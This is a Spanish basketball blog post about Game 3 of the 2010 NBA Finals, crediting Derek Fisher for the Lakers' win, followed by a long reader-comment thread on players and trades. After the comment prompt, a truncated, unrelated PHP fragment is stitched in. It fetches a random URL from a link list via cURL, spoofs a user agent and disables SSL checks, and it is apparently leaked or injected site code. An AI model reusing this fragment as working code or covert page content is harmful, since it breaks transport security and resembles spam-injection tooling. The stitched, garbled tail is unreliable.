Finales 2010 (3er partido): Por la boca muere el pez

09 de June de 2010 por TheDeerHunter

kbfisher… y ese pez siempre pica en la misma caña. La del “Rey Pescador” de Los Ángeles Lakers.

A grito limpio se despedía Paul Pierce del respetable en el Staples tras haber robado la ventaja campo en el segundo partido. “¡No volveremos a L.A.!”, retaba a la grada, muy crecido a pesar de una actuación personal más bien discreta. Seguro que no se esperaba que sus palabras pudiesen resultar proféticas pero en una dirección que nadie en Boston desearía.

Tal y como están ahora mismo las cosas es posible que no vuelvan a L.A., siempre que los Lakers ganen los dos próximos partidos en el Garden de Boston. La ventaja campo ha durado poco a los Celtics y toda la presión vuelve sobre sus espaldas. Otra victoria amarilla en alguno de los dos próximos partidos podría resultar definitiva.

Anoche volvió a ser Derek Fisher quien marcó la diferencia. Como siempre, en un partido trabado y emocionante, en una cancha hostil como antaño lo fue el Álamo, el infierno de Salt Lake o el Amway Arena de Florida. Ante técnicos de primer orden, con todas las variables estudiadas, como Popovic, Rivers, Sloan o Stan Van Gundy. Ante temibles rivales, siempre superiores a priori y de boquilla frente al bueno de Fish: Parker, Deron, Nelson o Rondo… Todos lo terminan sufriendo en sus carnes. El supuesto punto débil de L.A. es la piedra con la que todos se tropiezan. El líder oscuro, el alma del verdadero campeón, un auténtico especialista en fabricar anillos.

Cuando el partido apretaba y la bola quemaba, con todo el público jaleando tras la enésima remontada, viendo cómo los verdes acechaban irremediablemente la victoria, Fisher hablaba sereno y los demás escuchaban. Escuchaba Kobe, Gasol, Odom, Artest… parecía decirles “aquí estoy yo, llega mi momento. No tenéis nada por qué preocuparos”. Momento mágico y mítico para cualquier aficionado amarillo, pues se avecinaba la profanación del templo.

Fisher anotó en el último periodo 5 canastas como 5 soles, con algún +1 y algún otro que se fue al limbo. Ya no era Fisher quien perseguía como un loco a Rondo o Allen. Eran ellos quienes kgallenrefcorreteaban, impotentes, tras su estela. El clásico tirito con la zurda a tabla ayer hizo ciscos la defensa de Doc Rivers. Y no fue lo único que aportó el base. 1 de 11 lograron sus pares anoche a pesar de toda la maraña de bloqueos: sobre todo Allen, pero también Rondo, Pierce e incluso Garnett llegaron a ser marcados circunstancialmente por él. Fracaso total. Llamadlo casualidad si os place.

El triunfo de Fisher coincide con el estrepitoso batacazo que se dio Ray Allen anoche. Los días de vino y rosas, de récords y entrevistas, darán paso a un via crucis mental que no envidiamos el resto de los mortales. Nada menos que un terrorífico 0 de 13, con 0 de 8 en triples. Un rosco como una casa que hundiría la carrera de cualquiera. Si alguien puede resarcirse ése es sin duda Ray Allen, pero trabajo tiene por delante para recuperar la confianza. Las consecuencias han sido dolorosas pero queda tiempo de remediarlo.

Fue un partido raro y muy trabado. No estuvo demasiado clarividente Kobe, aunque al menos sí fue capaz de delegar en Fisher lo que no delegó en Pau el otro día. Al pívot español también lo vimos fatigado y timorato. Odom y Bynum, irregulares, igual que Pierce o Rondo por los Celtics. Sólo un Garnett rejuvenecido y Davis vieron aro con cierta facilidad. No fue noche para las estrellas, si es que todavía somos capaces de considerar a Fisher simplemente como un gregario.

kgpauPREMIOS

MVP: “Derek being Derek”, explicaba Kobe tras el partido. Fisher haciendo de Fisher, es decir, ganando partidos que valen títulos. Si Mitch Kupchack todavía dudaba de si renovar al veterano base este verano, cuando se convierte en agente libre, anoche encontró motivos más que suficientes para presentarle esta mañana a primera hora un contrato multianual.

La sorpresa: Seguro que en algún sitio está escrita la prohibición de considerar a Garnett como la sorpresa, con lo cual nos quedamos con la efectividad de cara al aro de ambos banquillos. Los suplentes de los Lakers anotaron 9 de sus 11 lanzamientos, mientras que los de los Celtics lograron 10 de 18. Nada mal teniendo en cuenta que ninguno de los dos equipos alcanzó el 45% en tiros de campo.

La decepción: No esperábamos otra actuación como la del domingo, pero el 0 de 13 en tiros de campo con 0 de 8 en triples de Ray Allen es una de las peores actuaciones jamás vistas.

El mayor esfuerzo en vano: Apareció Kevin Garnett, que esta vez superó a Gasol y se fue hasta los 25 puntos, con 11 de 16 en tiros, a los que sumó 6 rebotes, 3 asistencias y la esperanza para los aficionados Celtics para lo que quedan de Finales.

Comenta

38 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Supongo que en L.A. ya tienen las medidas de Fisher para ir haciéndole la estatua que se merece.

    GRANDE.

      Citar

  2. TheDeerHunter dice:
    #2

    Quiero mencionar fuera de carta a Walton. Su estadística practicamente vacía sí… pero el +13 o el primer cuarto para enseñarlo en las escuelas queda ahí para sus críticos.
    Y no es la primera vez, como seguramente no será la última. Por ese tipo de cosas los aficionados amarillos le respetamos tanto…

    PD: y grande Vujacic decidiendo el partido XD

      Citar

  3. mmmm dice:
    #3

    Profetaba un partido bueno de Garnett y ha sido… en una derrota.
    No he visto el partido, pero parece que ha sido como el 2º pero con la balanza hacia el otro lado. En fin, todavía quedan esperanzas si ganamos los 2 siguientes.

    Qué mal Allen… el karma es lo que tiene.

      Citar

  4. kantonyo dice:
    #4

    Por motivos de curro no he podido ver los partidos, me tengo que conformar con highlights y boxscores, y sobre todo como no, con vuestros resumenes y comentarios.

    Deer, cuantas bocas callan estos Lakers no? me recuerda a tu articulo del año pasado cuando fueron campeones, “nunca unos campeones han sido tan criticados”, y aún me choca más, viendo que esas criticas vienen de buenos aficionados con grandes conocimientos.

    Esto me hace pensar que muchas criticas son validas y ciertas, pero lo que está claro es que este equipo hoy por hoy es el mejor con diferencia.

      Citar

  5. Txusma dice:
    #5

    Este Fisher es un crack. Se curra 2 o 3 partidos al año pero siempre lo hace en el momento adecuado…

    Pero vamos, que yo mantengo que si Fisher no hubiera jugado nunca en los Lakers nadie se acordaría de él.

      Citar

  6. TheDeerHunter dice:
    #6

    Bueno, yo creo que si Fisher no hubiera jugado en los Lakers se lo hubieran rifado los Utah, Spurs, Celtics, Pistons… y sí que nos terminaríamos acordándonos de él. Estoy cansado de decir que tiene un talento único… al nivel de los más grandes de la historia en esa faceta (aunque es evidente que no en otras)
    Salvando las distancias lo compararía con Ainge, Vinnie Johnson, Rodman, Horry, Grant, Ellie, Harper… son claros ejemplos de gregarios que trascienden más allá de los equipos campeones en los que hayan estado. También sostengo que unos y otros han administrado sus prestaciones conforme al papel que les ha tocado en suerte en cada momento… y eso es algo muy encomiable y al mismo tiempo muy poco valorado.

    Lo de las críticas, Kantonyo… este año lo noto menos, porque también creo que los Lakers están dando una imagen más seria a pesar de las dificultades, pero particularmente creo que hay demasiada gente que se ha ensañado especialmente con Fisher el año que menos se lo merece diría que de toda su carrera. Está cuajando unos playoffs fabulosos. Es muy fácil culparle de lo del otro día de Ray Allen cuando nadie de este planeta hubiera podido pararle.

      Citar

  7. MagicJohnson32 dice:
    #7

    No Txus, no funciona así. Nadie se acordaría de Fish si no llevase camino de su quinto anillo (no es que dé por acabadas las Finales, ojo), si no hubiese sido decisivo en varios de ellos, si no tuviese una colección de canastas decisivas que ya la quisieran la mayoría de los más grandes de la historia, si no fuese el líder de un equipo campeón y no tuviese un papel clave en el funcionamiento interno del vestuario.

    Lo dices como si estar en grandes equipos te pusiera las cosas fáciles, cuando en mi opinión es al contrario. En equipos con esta exigencia apenas hay margen de error.

      Citar

  8. Txusma dice:
    #8

    Si y no. Si Fisher lleva 5 anillos es principalmente gracias a Kobe, Shaq y Gasol. No niego que Fisher siempre ha sido clave en algún momento de esos anillos pero lo particular d nuestra memoria nos debe llevar a olvidar los 90 y tantos partidos restantes o incluso esos mismos partidos donde a lo mejor, se llega a un final igualado en parte por culpa de Fisher. De hecho, todos nos acordamos de la canasta a falta de 0.4 segundos de Fisher (q no acabó en anillo el tema, fíjate) cuando en ese partido Fisher había anotado 8 puntitos y repartidos un par de asistencias.

    Y estar en los equipos grandes te facilita ser conocido y tener la oportunidad de jugar los grandes partidos o tbme diréis que no? No vale lo mismo, una canasta ganadora en las Finales que en medio de la regular, evidentemente y me da que, por ejemplo, Deron Williams no podrá jugarse muchas de estas ni demostrar al mundo lo bueno que puede llegar a ser en el último cuarto del tercer partido de la final. Pero vaya, que si Utah llegara a esa final estoy seguro que sería culpa de Deron, principalmente, aunque q tampoco puede asegurar de Fisher.

    Pero vamos, que firmo ya mismo la carrera de Fisher para mí mismo.

      Citar

  9. Love Denise dice:
    #9

    tiene guasa que en el partido en que Garnett sea el de antaño pierdan.
    Que quereis que os diga, pero no me gustó el partido de Bryant en absoluto, por muchos puntos que metiese, esos tiros forzados…bah. Alguien cree que si los Lakers ganan, Gasol se podría llevar el MVP,? o se lo llevará Bryant a pesar de que su juego no está siendo tan bueno como en eliminatorias anteriores (al menos para mi), Bueno deer hunter supongo que le daría el MVP a Walton jejje 🙂

      Citar

  10. PIRATA dice:
    #10

    Yo pensaba igual que tu Love sobre el mvp de Pau, pero el partido de ayer de Pau……….y también creo que aunque se marque dos partidazos más se lo darian a Kobe.
    A ver si en próximo Pau està más fresco.

      Citar

  11. TheDeerHunter dice:
    #11

    Bueno… alguno todavía es capaz de decir que 3 de los anillos de Kobe son gracias a Shaq, o que el anillo de Gasol es regalito de Kobe, o que Pippen era un mediocre a la sombra de Jordan, de Havlicek y Cousy, Parish y McHale (ni te digo ya de Dennis Johnson y Ainge) o incluso (cágate lorito) he llegado a oirlo de Kareem Abdul-Jabbar con respecto a Magic Johnson.
    A menudo confundimos el término “jugador franquicia” o “primera espada” y lo extendemos más allá de sus propias posibilidades y de la realidad misma de la historia.

    Nadie se le ocurre situar a Fisher… o a la mayoría de los otros gregarios de superlujo entre los altares de la individualidad. Nada de lista de los 50 mejores ni nada por el estilo. Su valor es otro. ¿Que ha tenido la gran suerte de mostrar su talento en equipos campeones? Pues lógicamente… porque las palabras equipo y campeón las lleva tatuadas a fuego el bueno de Fisher. Si no hubiera sido aquí hubiera sido en otro lado, pero sin ser un Deron Williams me da que hubiera tenido sitio en todos los equipos campeones de la última década, por no decir casi de toda la historia de la competición. Por su perfil y caché seguramente no podríamos decir lo mismo de Deron Williams. Es evidente.

    Tampoco me parece justo centrar el papel de Fisher en dos o tres tiros decisivos… eso es únicamente la punta del iceberg.

    En casi cualquier deporte colectivo cada cual tiene un papel asignado. No creo que exista nadie que pudiera desempeñar el papel de Fisher mejor que el propio Fisher. Ya está considerado por méritos propios como el mejor “role-player” que queda en activo. El último de una larga y honorable saga que se han dedicado de forma casi altruista a sudar sangre para que otros puedan lucirse con anillos de “primera espada” entre los dedos.

      Citar

  12. TheDeerHunter dice:
    #12

    No estaría de más que por una vez reconozcas lo de Walton, LDenise. Con lo que sueles valorar la circulación tú no entiendo como no ves la diferencia de los sistemas con y sin él en cancha. Los mejores minutos colectivos de L.A. anoche vinieron por ahí.

    Antes de anoche no tenía dudas con lo de Gasol MVP. Tampoco creo que nos debamos cebar… le pesan las piernas como a casi todo el mundo por estas fechas.

    Y el partido de Kobe a mí tampoco me gustó nada… pero también hay que decir que hubo momentos en los que él era el único que no soltaba la bola como si quemara. Si somos justos también debemos valorar que ayer se inhibiera en favor de Fisher… y defensivamente lo dejó todo en la cancha. No siempre se puede estar acertado, sobre todo si tienes a los Celtics finalistas acosándote.

      Citar

  13. Txusma dice:
    #13

    Bueno claro, para lo que es Fisher da un gran rendimiento. De hecho, nadie espera nada de él hasta los Playoffs.

    Ahora mismo la sensación es que, a pesar del mal partido de Pau de ayer, el MVP debería ser suyo. El segundo parte fue infame y el de ayer tampoco para tirar cohetes. Eso sí, tengamos claro que si ahora los Lakers ganan 2 seguidos con Kobe y Pau a un nivel parecido se lo darán a Kobe. Y más si mete la canasta ganadora aunque hubiera fallado los 2 intentos anteriores.

      Citar

  14. Nacho dice:
    #14

    Hola a todos, esla primera vez que posteo aquí, aunque os llevo leyendo un tiempo.
    Levamos tres buenos partidos por la tensión, pero no por el juego. Normal, son finales, pero…pues eso, esperamos.
    Si leéis el blog de Daimiel ya he dejado mi opinión sobre el partido allí, y no me gusta repetirme, pero quiero incidir en varias cosas:
    Con razón me daréis palos, pero a Vujacic con tiempo en cancha lo veo más que a Farmar y a Brown, últimamente defiende correctamente, abre más el campo, y ¡circula el balón! -como Walton- Puede perder bolas pero no va a hacer números. Comentas en el artículo los buenos porcentajes del banquillo, ¿seguro que los de F y B son buenos? ¿Cuántas bolas perdieron directa o indirectamente? Realmente no puedo con ellos, ¡joder yo solo he sido jugador de calle y he tenido más sentido colectivo que ellos! Ellos perdieron el segundo partido, con la ayuda de kobe y Phil, pero ¡coño! al llegar al último cuarto el efecto Allen estaba controlado y no creo que un gran Rondo y una serie buena de Nate Robinson (lo mismo hace a Celtics que estos dos a Lakers) puedan ser suficientes para batir a LA, y lo hicieron. En definitiva, el eslveno a lomejor no suma, pero estos dos restan. Quizás porque me quedan días para los cuarenta siempre he apreciado el trabajo de Fisher, y ayer se salió y lo que lo disfruté en el sofá a esas horas en laas que no se puede gritar.
    Para nosotros lo mejor es que lleguemos al séptimo, pero me da que todo depende de LA, y sin necesidad de hacer alaracas. BOSTON, además del Rondo de casi siempre necesitará a dos, o a todo el big three si los Lakers están medio entonados y leen las, normalmente, buenas defensas de los verdes. Con todo el MVP de la serie hasta el momento es Doc Rivers, aunque hay cosas que no entiendo como el no probar con Finley cuando Allen está guadiana.
    Un abrazo.

      Citar

  15. TheDeerHunter dice:
    #15

    Bienvenido Nacho, estás en tu casa.

    Ya anticipas que “con razón” te daremos palos con lo de Vujacic… desde luego no seré yo quien te quite esa razón, porque para mi es un despojo baloncestístico que cobra 5 kilos por año. El nivel de los otros dos tampoco está para tirar cohetes pero al menos son dos y encima cobran menos. En lo que podríamos estar de acuerdo es que los tres juntitos son un peligro ahora mismo… pero para los Lakers.
    No creo que ninguno de ellos perdiera el 2º partido. Para mí lo perdió Kobe y lo perdió Phil Jackson (como también Artest, Odom y Fisher) El nivel de exigencia no puede ser el mismo para unos y otros.

    @Txus… de Fisher se espera tanto en la temporada regular como de su equipo. Hasta que llegan los playoffs todo se ve con cierta filosofía en cualquier equipo campeón.

      Citar

  16. univerzee dice:
    #16

    En el debate de Fisher creo que estoy con Txusma, creo… es un buen jugador pero es un juegador que ha tenido la suerte de estar donde ha estado, primero con Shaq y con Kobe y después con Kobe y Gasol. Esta claro que no hay nadie que sea mejor que Fisher haciendo de Fisher… pero a lo mejor otro jugador en su puesto no hubiera tenido que hacer esas cosas que el ha hecho sino otras, por ello no creo que sea tanto como The ha expresado en su cronica, ni tan poco como muchos le dan otras veces… aunque sinceramente muchas veces durante regular season desentona y mucho.
    Sobre que Kobe si le cedió el protagonismo que no le dio a Gasol… pues no creo que Kobe le cedio eso, yo sinceramente pienso que Kobe dejo caer el partido para rescatarlo y siempre lo diré, y siempre lo pensaré y más sabiendo que hacia esas cosas en el instituto. Para Kobe el partido era yo lo cojo y lo gano y arreglado, pero ante su poca efectividad y visto que era un querer y no poder, un goteo la diferencia, pues decidió dejarlo correr para que se notará su omisión… durante el inicio de 4 periodo dejo de pedir la bola, incluso de subirla… la había subido siempre que había podido… y dejo de hacer… pero le salió mal, Fisher dos canastas y Odom otra le mantuvieron el partido y no pudo acudir al rescate como el hubiera querido, lo malo para Kobe, objetivamente es que el MVP fue Fisher, y del primer partido fue Gasol, aunque el tirara aquel triple que daba tacos gratis y llegaba a 30p. Si en las dos próximas victorias de LAL Gasol esta a la altura del primero el MVP es suyo.
    Y por no coincidir del todo, DWilliams no tendrá oportunidad de meter canasta decisiva en el tercer partido, ultimo cuarto de unas finales porque el, que es un buenísimo jugador de regular season deja bastante que desear en sus tomas de decisiones en los últimos instantes con finales apretados… precisamente un cluth player no es.

      Citar

  17. TheDeerHunter dice:
    #17

    Otros individualmente mejores que Fisher lo han hecho del culo junto a Kobe y Shaq… ahora mismo me viene a la cabeza gente como Van Exel o “El guante”. No me los imagino mejorando lo presente con Gasol. Ya les hubiera gustado cuajar en el sistema como lo ha hechoFisher.
    Nunca nadie tiene en cuenta que ser secundario de lujo no es un plato de gusto y no todo el mundo está preparado para desempeñarlo. El tirarte muchos minutos sin tocar bola en ataque y tener que resolver es algo a lo que no todo el mundo puede llegar ni teniendo toda la calidad del mundo… mucho menos si es en momentos en los que la gente, por lo general, se caga viva.
    Lo de anoche fue como lo he descrito, al menos desde mi perspectiva, puedes revisar la retransmisión y ver a Fisher arengar al resto. La cara de respeto de Kobe es algo que directamente NO tiene precio y representa de forma muy ilustrativa otros valores de Fisher que no se ven en la cancha. Y el resultado… pues el que fue. Tampoco nadie vende que Fisher sea un jugador supremo (aunque para algunos aspectos lo sea, sin ninguna duda)

    Con respecto a si Kobe juega con los resultados o no… creo simplemente es parte del folklore y la mítica que le rodea, pero no creo que se ajuste a la realidad. Tampoco creo que sea el mismo que fuera en el instituto, como que tampoco tiene a los mismos rivales.

      Citar

  18. MagicJohnson32 dice:
    #18

    Esta tarde a eso de las 19 horas publicaremos un artículo específico sobre Fisher.

      Citar

  19. Txusma dice:
    #19

    Exactamente a qué puede deberse el bajón de rendimiento de Kobe respecto a la serie frente Phoenix? Sólo hay que comparar porcentajes de acierto… Es la defensa de Boston? Es el mismo Kobe que parece querer erigirse en salvador constante? Cansancio?

      Citar

  20. s_13 dice:
    #20

    Espero que Paul Pierce lleve razon y la serie no vuelva a LA!

      Citar

  21. Viva_Dirk dice:
    #21

    Evidentemente la defensa de Boston no es la misma que la de Phoenix, Tony Allen en concreto lo esta defendiendo bien y además no esta anotando tiros que suele meter. Estoy seguro de que veremos algun gran partido por su parte.

    De Fisher prefiero ni discutir, mi duda al acabar el último cuarto era fue si es mejor que Michael Jordan, jojo.

      Citar

  22. AndiD dice:
    #22

    Pues yo creo que voy a llevar la contraria a mucha gente con este comentario, pero…
    No creo que la mejor jugada posible cuando vas 4 arriba y quedan menos de 50 segundos sea irse hasta el aro con 3 tíos delante. Que sí, que la jugada le salió bien y ganó el partido, pero lo más normal hubiera sido que la fallase con los 3 saltando a por él.
    No es esa la jugada que esperas de un base con su experiencia, no?

      Citar

  23. pcerezo dice:
    #23

    Yo creo que eso de que Fisher ha tenido suerte por recalar en Los Lakers no me lo creo. Creo que en todos los años el servicio que le ha dado a los Lakers ha sido ejemplar y en PO siempre ha habido algún partido o eliminatoria que ha influido grandemente en el juego o resultado. No es casualidad los tiros importantes que mete o que en un cuarto meta 10 puntacos cuando te estás jugando las lentejas.
    Exigir a Fisher lo que no es no tiene sentido. Todos sabemos que no es un point guard como Deron, Chris Paul, Nash, Rondo…el no influye en el juego porque los equipos de Jackson nunca han buscado un base de esas características.
    De todas formas como es este maldito deporte. La noche anterior metes ocho triples seguidos y al día siguiente no eres capaz de meter trece de los que lanzas. Inexplicable. De todas formas pienso que solo con energía los Lakers van a ganar esta final, los Celtics están completamente rotos, muertos. No pueden más, Pierce y Garnett son un poema en el último cuarto.
    Creo sinceramente que esta final sola la pueden perder los Lakers, pase lo que pase va a depender más de Lakers (carajas, empanadas, egos…) que de lo que hagan los Celtics, porque los primeros son mucho mejores.

    Un saludo,
    Pablo

      Citar

  24. pcerezo dice:
    #24

    Por cierto en cuanto a Nacho y Vujacic, yo por mi parte voy a corre un tupido velo y he hecho como que no lo he leído. Es broma Nacho, bienvenido.

    Deer, no sé como está el tema salarios pero un trade farmar, Brown y Vujacic por Dragic, qué tal?

    Un saludo,
    Pablo

      Citar

  25. Txusma dice:
    #25

    Yo aún recuerdo cuando los lakerianos tenían a Shannon Brown en un pedestal. Y ahora ya tiene ganas de traspasarlo!

      Citar

  26. Akenaton dice:
    #26

    Toda la serie lamentables los árbitros, menos mal que son lamentables a discreción yo sólo con un equipo.
    La defensa a Kobe es brutal, pero la incapacidad de Kobe de confiar en los compañeros es preocupante. Odom muy bien ayer no?.
    Fisher tiene unas pelotas del copón, pero yo diría que fue todo obra suya, las jugadas no eran las normales, sino que él dijo, me toca y se lo guisó y comió con el beneplácito de un Rondo que no se lo esperaba.

    Es curioso que estuviesen casi 20 arriba los lakers y perdiesen toda la ventaja a base de jugar como el culo, con mala decisión tras mala decisión tras patética decisión. Dónde estaba Phil?

      Citar

  27. Viva_Dirk dice:
    #27

    No recuerdo a ningun aficionado de los Lakers que halla tenido a Shannon Brown en un pedestal.

      Citar

  28. Txusma dice:
    #28

    Pues yo juraría que en esa racha de mates y tapones impresionante que tuvo antes del All Starts a más de un lakeriano se le caía la baba y hablaba de lo inteligentes q habían sido los directivos de los Lakers al conseguirlo en el trade por Radmanovic. De hecho, creo que más de uno pedía que fuera titular en lugar de Derek Fisher.

      Citar

  29. Txusma dice:
    #29

    En ACB.com le dedicaron un artículo y todo : http://blogs.acb.com/blog/elpuntog/post/lo-sobrenatural-en-shannon-brown

      Citar

  30. Viva_Dirk dice:
    #30

    Hombre entre fliparlo con los mates/tapones que hace y ‘tenerlo en un pedestal’ va un mundo. En cuanto a lo de la titularidad, me suena mas a comentarios de aficionados a otros equipos.

      Citar

  31. Love Denise dice:
    #31

    pcerezo, te refieres a un trade Farmar, Brown, Vujacic por Dragic? 3 x1?
    Salarialmente es imposible, Dragic “solo” cobra 1,8 kilos, por los 1,9 de Farmar, 2 de Brown y 5 de Vujacic!!!!

    pues si, brown me sigue pareciendo un jugador totalmente valido para estos Lakers, no es un crack, ni jugador franquicia, pero si un buen jugador de equipo, con una buena defensa, y capaz de conseguir una buena anotación, si le dan mas tiros y confianza. Además, su rendimiento es totalmente acorde a lo que cobra, cosa que otros jugadores protegidos no pueden decir.

      Citar

  32. MagicJohnson32 dice:
    #32

    Shannon Brown es un suplente correcto. Tiene un problema, y es que juega a una velocidad determinada y sólo sabe jugar a esa velocidad. Necesita correr, necesita partidos rápidos. Lo otro es que no es base.

    Lo bueno es que no se corta, confía en sí mismo y no es de los que se quitan los marrones de encima para que la cague otro.

    Además, teniendo en cuenta cómo llegó a los Lakers, buf, un canto en los dientes…

      Citar

  33. pcerezo dice:
    #33

    Love Denise,

    Por eso preguntaba tema salarios. No los sabía. Pero vamos si fuera posible por salarios…

      Citar

  34. Txusma dice:
    #34

    Yo lo comentaba pq alguien por aquí ya lo quería largar y yo tb lo tengo por un suplente correcto. Tal vez exageré un poco al decir que estaba en un pedestal. En un pedestal está Fisher y eso que es un titular correcto. 😀

      Citar

  35. Nacho dice:
    #35

    Siento discrepar del tema Brown.
    Podría ser un suplente correcto si entendiera el juego del equipo. Una cosa es imprimir más ritmo, jugarse unos tiros y dar espectáculo con mates y tapones, y otra pegarse la bola al cuerpo sin criterio. Reconozco que en un principio pensé que podía ser una versión más completa y mejorada de Farmar, pero en estos Playoffs se ha retratado. No mira al juego interior de su equipo, no circula el balón, lo del pase extra a él suena a chino, en fin, que sea barato noquiere decir que sea válido en relación a su calidad. Aunque no me hagáis caso, ya sabéis que yo confío en Vujacic.
    Farmar me parece mucho más sólido que Brown, y daros cuenta, mejora cuando no está con él en pista.
    Yo también creo que los Lakers dieron más sensación de jugo coherente en el 2º que en el 3º. Hasta el último cuarto. Y ¿quienes jugaban? ¿Recordamos todos los 20 segundos botando cual pato mareado a Ron Ron para luego tirarse un churro? Lo siento, pero yo también lo habría hecho. También habría asistido atónito acomo jugadas antes Farmar y Brown se las jugaban por que sí, y me hubiera dicho, “para que flipen estos, flipo yo”, y todo terminó como terminó.
    Por cierto, todos nos quejamos de que Kobe a veces hace la guerra por su cuenta (damos por descontado que es el puto crack) pero que le pregunten a Bynum o a Gasol a quié prefieren por fuera. Porque cuando se juntan Farmar, Brown, Artest y Odom por fuera, el 5 solo la huele si coge el rebote.
    Y ya que estamos de polémicas, y fuera de estas finales, ¿a alguien más le parece que Chris Bosh, siendo buen juador, es un poco un pluff que busca sus números y que aporta poco colectivamente? Vamos que está bastante sobrevalorado. No me hagáis mucho caso, me gusta Vujacic, pero en los tres últimos años que lo he seguido con asiduidad he tenido esa sensación.

      Citar

  36. TheDeerHunter dice:
    #36

    Creo que exageras con respecto a Brown… sobre todo en la comparación con Vujacic. Es innegable que tiene defectos y que está jugando de pena desde finales de conferencia. Tampoco te olvides que no lo hizo nada mal contra Utah o contra Ocklahoma, sin hablar de unos buenos playoffs el año pasado… malas rachas la suelen pasar muchos jugadores, sobre todo los más jovenes.
    Tiene algunas virtudes. Su potencia le puede permitir ser un perro de presa muy incómodo sobre el base y está mejorando el tiro. En carrera es casi imparable. Le falta mucho pulir otros aspectos y a medida que vaya ganando experiencia disimulará otros. Me parece un jugador muy del perfil que busca Phil Jackson.

    Pero lo mejor de todo, como decía Magic, su llegada supuso la salida del Radmapakete… aunque Vujacic no tardó en recoger el testigo. A mí me sabe mal decirlo, porque tras aquella eliminatoria contra San Antonio de hace dos años me pareció ver un jugador aprovechable. Pero más bien se ha quedado en un jugador aprovechado… para mí no queda ninguna duda de que lo mejor para los Lakers es que se deshagan de él cuanto antes.

      Citar

  37. CAMPO2 dice:
    #37

    Hola

    Sobre el tema Brown en un partido de los Viernes que retransmite Cuatro, hablaba Daimiel sobre el diciendo que acabaría la temporada de tirular o que se le comería los minutos a Fisher, tambien dijo que en los play-offs Fisher sería el tirular y quien jugaría los momentos decisivos, a mi personalmente me gusta mas que Vujacic y Farmar, Vujacic me parece un paquete de cuidado que a al hora de defender va como pollo sin cabeza y le falta fisico, y Farmar no sabe que la bola es para Kobe o Gasol o Bynum primero y luego si quieres y no hay otra posibilidad te la juegas.

    Nacho estoy contigo en el tema Bosh me parece un jugador sobrevalorado y creo que como segunda espada si aceptase ese rol sería mejor jugador

    Avery Johnson a los mis Nets, gran entrenador de regular y pesimo de Play-offs(ya se que llego a una final), espero que deje que se desarrollen Lopez y T. Williams

      Citar

  38. Txusma dice:
    #38

    Y parece que sube enteros la opción Favors para los Nets (si es que Turner no cae a la tercera posición). Podemos decir aquello tan tópico de “harris, lee, Williams, Favors, Lopez” no suena mal. Eso sí, estos no ganan nada hasta de aquí 4 años. 😀 Veremos si algún agente libre de los buenos se va para allá. Joe Johnson?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>